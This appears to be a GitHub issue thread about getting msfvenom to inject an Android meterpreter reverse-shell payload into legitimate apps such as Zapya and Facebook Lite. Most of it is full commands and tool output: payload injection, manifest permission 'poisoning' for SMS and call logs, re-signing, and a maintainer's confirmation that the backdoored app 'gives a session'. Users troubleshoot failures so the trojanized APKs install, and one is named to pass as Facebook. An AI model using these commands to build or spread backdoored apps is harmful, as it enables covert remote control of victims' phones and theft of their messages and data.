Closed BlaacckK closed 7 years ago
Probably anti-reversing in Facebook. Try and compare to Uber.
i tried with other apps works fine on most of apps.
You may need to turn to some external backdooring tools for different apk protection schemes... At least till we have em covered here. Any notes you can compile while addressing this would help in that effort.
msfvenom -x zapya.apk -p android/meterpreter/reverse_http LHOST=LHOST LPORT=4444 -o /root/Desktop/Zapya.apk
Using APK template: zapya.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[] Creating signing key and keystore..
[] Decompiling original APK..
[] Decompiling payload APK..
[] Locating hook point..
[] Adding payload as package com.dewmobile.kuaiya.arjam
[] Loading /tmp/d20170726-1573-17y8bl2/original/smali/com/dewmobile/kuaiya/app/MyApplication.smali and injecting payload..
[] Poisoning the manifest with meterpreter permissions..
[] Adding
For zapya it stucks here doesn't go any further
@BlaacckK I can't reproduce this. It injects into Facebook lite just fine:
msfvenom -x ../../apks/facebook_lite_v52.0.0.4.89.apk -p android/meterpreter/reverse_tcp LHOST=LHOST LPORT=4444 -o out.apk
Using APK template: ../../apks/facebook_lite_v52.0.0.4.89.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.xqrmc
[*] Loading /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/original/smali/com/facebook/lite/LiteAppShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding ../../apks/facebook_lite_v52.0.0.4.89.apk with meterpreter injection as /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
[*] Signing /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
[*] Aligning /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
Payload size: 1263312 bytes
Saved as: out.apk
Success
The app can then be installed and gives a session as normal.
Do you have the latest apktool? I have 2.2.2:
$ apktool -v
Apktool v2.2.2 - a tool for reengineering Android apk files
with smali v2.1.3 and baksmali v2.1.3
No, i have 2.2.1 That must be the problem Thanks
i'll upgrade it
msfvenom -x Facebooklite_v_50.apk -p android/meterpret/reverse_tcp LHOST=IP LPORT=port -o /root/Desktop/Facebook.apk embedded metasploit payload in a apk using thr above command when i install it on android running 6.0.1 it says app not installed. however normal android payload made with this command msfvenom -p android/meterpret/reverse_tcp LHOST=IP LPORT=port -o /root/Desktop/Facebook.apk works great
Thanks